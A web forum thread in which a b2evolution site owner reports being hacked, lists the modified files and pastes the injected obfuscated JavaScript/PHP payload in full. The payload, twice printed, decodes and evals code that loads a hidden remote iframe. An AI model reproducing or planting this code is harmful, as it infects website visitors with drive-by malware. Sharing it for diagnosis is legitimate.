- b2evolution CMS Support Forums
- b2evolution Support
- General Support
- Sites were hacked
1 fredsy Aug 28, 2013 09:35
In all likelihood I was hacked because I haven't upgraded from an early 4x and 3.3.2 (former on one site, latter on two other sites) all residing on the one host. (Yes well I didn't like 4x version so I wanted to stay with the earlier ones... sigh...) However, because I don't know much about hacks and what to look for in terms of problem areas, I'm posting this info to see if anyone has any more info/ideas/suggestions of what went wrong.
And yes, I am checking the usual stuff, but at the moment it doesn't look like my computer has a virus or anything like that. All my config files are set to 444 permissions, with the rest being at 644, and 755 for the media folder. No sign of help from my web host which suggests it's not a server issue.
Files hacked:
default.php
/cron/index.html
/htsrv/index.html
/htsrv/login.php
/inc/index.html
/locales/index.html
/media/index.html
/media/users/index.html
/media/users/admin/pics
/media/blogs/index.html
/rsc/index.html
all files in rsc/js
/skins/index.html
/skins/_410_stats_gone.main.php
/skins/_404_blog_not_found.main.php
/skins/_403_referer_spam.main.php
/skins/skin name/index.main.php, and some other files like single.main, etc
/skins_adm/conferror
/skins_adm/index.html
/skins_adm/access denied
/skins_adm/login
/xmlsrv/index.html
Some other non-b2evo html files in root that I used for placeholders and/or old info
And files added in root:
FtLy234n.php
zwxvr4Dh.php
This is the copy of what was added, some were javascript and some were placed in the php files.
#4f57d2#
if(empty($not)) {
$not = "<script type=\"text/javascript\" language=\"javascript\" >szt=\"s\"+\"p\"+\"li\"+\"t\";uec=window;cqb=\"dy\";naoos=document;apxzzr=\"0x\";kyfdr=(5-3-1);try{++(naoos.body)}catch(qndo){guapu=false;try{}catch(mtvof){guapu=21;}
if(1){mmlv=\"17:5d:6c:65:5a:6b:60:66:65:17:63:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:63:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:5a:60:6b:70:6a:5a:58:67:5c:6a:63:58:65:5b:6a:5a:58:67:60:65:5e:25:5a:66:64:26:44:5b:64:69:39:2f:48:5a:25:67:5f:67:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:30:2e:27:28:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:30:2e:27:28:67:6f:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:30:2e:27:28:67:6f:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:30:2e:27:28:1e:32:4:1:17:63:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:30:2e:27:28:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:63:53:1e:17:5a:63:58:6a:6a:34:53:1e:63:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:63:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:27:30:1f:20:32:4:1:74:4:1:74\"[szt](\":\");}uec=mmlv;smq=[];for(uhz=22-20-2;-uhz+1379!=0;uhz+=1){czpirh=uhz;if((0x19==031))smq+=String[\"fromCharCode\"](eval(apxzzr+uec[1*czpirh])+0xa-kyfdr);}pqul=eval;pqul(smq)}</script>";
echo $not;
}
#/4f57d2#
<!--4f57d2--><script type="text/javascript" language="javascript" >fqtwn="s"+"p"+"li"+"t";svqgfs=window;clek="dy";eyudec=document;jqh="0x";rfqrl=(5-3-1);try{++(eyudec.body)}catch(ekgnkr){tgobje=false;try{}catch(ziaid){tgobje=21;}
if(1){neyf="17:5d:6c:65:5a:6b:60:66:65:17:62:68:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:62:68:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:62:68:5f:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:5a:60:6b:70:6a:5a:58:67:5c:6a:63:58:65:5b:6a:5a:58:67:60:65:5e:25:5a:66:64:26:44:5b:64:69:39:2f:48:5a:25:67:5f:67:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2e:2b:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2e:2b:67:6f:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2e:2b:67:6f:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2e:2b:1e:32:4:1:17:62:68:5f:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2e:2b:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:62:68:5f:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:62:68:5f:53:1e:17:5a:63:58:6a:6a:34:53:1e:62:68:5f:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:62:68:5f:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:62:68:5f:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:62:68:5f:27:30:1f:20:32:4:1:74:4:1:74"[fqtwn](":");}svqgfs=neyf;oekd=[];for(vjf=22-20-2;-vjf+1399!=0;vjf+=1){guje=vjf;if((0x19==031))oekd+=String["fromCharCode"](eval(jqh+svqgfs[1*guje])+0xa-rfqrl);}udabgd=eval;udabgd(oekd)}</script><!--/4f57d2-->
3 fredsy Aug 29, 2013 06:54
What host are you with? I've found mine has been undergoing lots of hacking in the past few days - West Host.
4 jrawly Aug 29, 2013 10:14
I am with Host9
5 fredsy Sep 03, 2013 06:43
Hmm, so not part of the same hackfest. Well, I think upgrading probably did the trick... serves me right for not doing it sooner I guess. Good luck with your site, hope they don't return for you either!
Same has happened to me a number of times in the last couple of weeks I was running 4.1.7.
Updated to latest v5 now.